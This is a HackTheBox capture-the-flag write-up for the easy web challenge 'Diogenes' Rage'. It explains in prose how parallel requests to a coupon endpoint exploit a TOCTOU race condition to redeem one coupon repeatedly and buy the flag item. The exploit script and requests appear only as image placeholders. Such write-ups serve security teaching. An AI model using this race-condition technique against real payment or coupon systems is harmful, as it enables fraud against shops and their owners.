HackTheBox Writeup - Challenges - Diogenes' Rage

HackTheBox Writeup - Challenges - Diogenes' Rage

🕒 2025/04/29

  • Category: Web
  • Difficulty: Easy
  • IP: 83.136.252.199:57508

1. Website

What you can do:

  1. Insert a coupon ($1) and you can buy items.
    POST /api/coupons/apply
    image
  2. Enter the code of the item you want to buy, and you can purchase it (if you have enough money).
    POST /api/purchase
    image image

2. Source Code

  • routes/index.js

    • POST /api/coupons/apply
      image
      Note that this function is asynchronous.

    • POST /api/purchase
      image

      • #31~34: by purchasing item C8, we will get the flag

3. Burp Suite

  • POST /api/coupons/apply HTTP/1.1
    image

  • POST /api/purchase HTTP/1.1
    image

4. TOCTOU Race Condition

Time-Of-Check-To-Time-Of-Use (TOCTOU) Race Condition allows an attacker to redeem the same coupon multiple times by racing two or more parallel requests.

Attack Path:

  1. Capture an arbitrary user’s session cookie.

    • POST /api/purchase HTTP/1.1
      image

  2. By sending parallel POST /api/coupons/apply requests with the user’s cookie, we can exploit the TOCTOU race condition to obtain multiple coupons.

    • exp.py
      image
    • python3 exp.py
      image

  3. Now that we have enough money, we can purchase item C8, which contains the flag we want.

    • Flag
      image